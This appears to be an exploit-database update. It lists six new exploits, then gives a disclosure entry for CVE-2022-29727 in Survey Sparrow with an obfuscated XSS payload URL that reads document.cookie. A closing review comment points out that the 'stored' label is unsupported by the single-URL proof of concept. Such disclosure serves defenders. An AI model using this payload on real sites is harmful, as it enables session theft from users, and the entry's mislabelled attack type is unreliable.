
6 changes to exploits/shellcodes

SDT-CW3B1 1.1.0 - OS Command Injection
SolarView Compact 6.0 - OS Command Injection
Survey Sparrow Enterprise Survey Software 2022 - Stored Cross-Site Scripting (XSS)
T-Soft E-Commerce 4 - 'UrunAdi' Stored Cross-Site Scripting (XSS)
T-Soft E-Commerce 4 - SQLi (Authenticated)
Showdoc 2.10.3 - Stored Cross-Site Scripting (XSS)
# Exploit Title: Survey Sparrow Enterprise Survey Software 2022 - Stored Cross-Site Scripting (XSS)
# Date: May 11 2022
# Exploit Author: Pankaj Kumar Thakur
# Vendor Homepage: https://surveysparrow.com/
# Software Link: https://surveysparrow.com/enterprise-survey-software/
# Version: 2022
# Tested on: Windows
# CVE : CVE-2022-29727
# References:
https://www.tenable.com/cve/CVE-2022-29727
https://github.com/haxpunk1337/Enterprise-Survey-Software/blob/main/Enterprise-Survey-Software%202022

#POC

For Stored XSS

Visit
https://LOCALHOST/login?test=Javascript%26colon;%252F%252F%E2%80%A9confirm?.(document.cookie)//

XSS Executed
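
Review bot: The steps under "For Stored XSS" consist of a single "Visit" URL carrying the payload in the `test` query parameter of `/login`, and nothing in the file shows where that input is persisted or which later view renders it, so the PoC as written does not support the "Stored Cross-Site Scripting" title. Suggest adding the storage point and the page that outputs the value, so defenders know which field to validate and which output to encode, or retitling the entry to match what the steps demonstrate. The header's "Version: 2022" and "Tested on: Windows" would also be more useful for triage with a build number and the browser used.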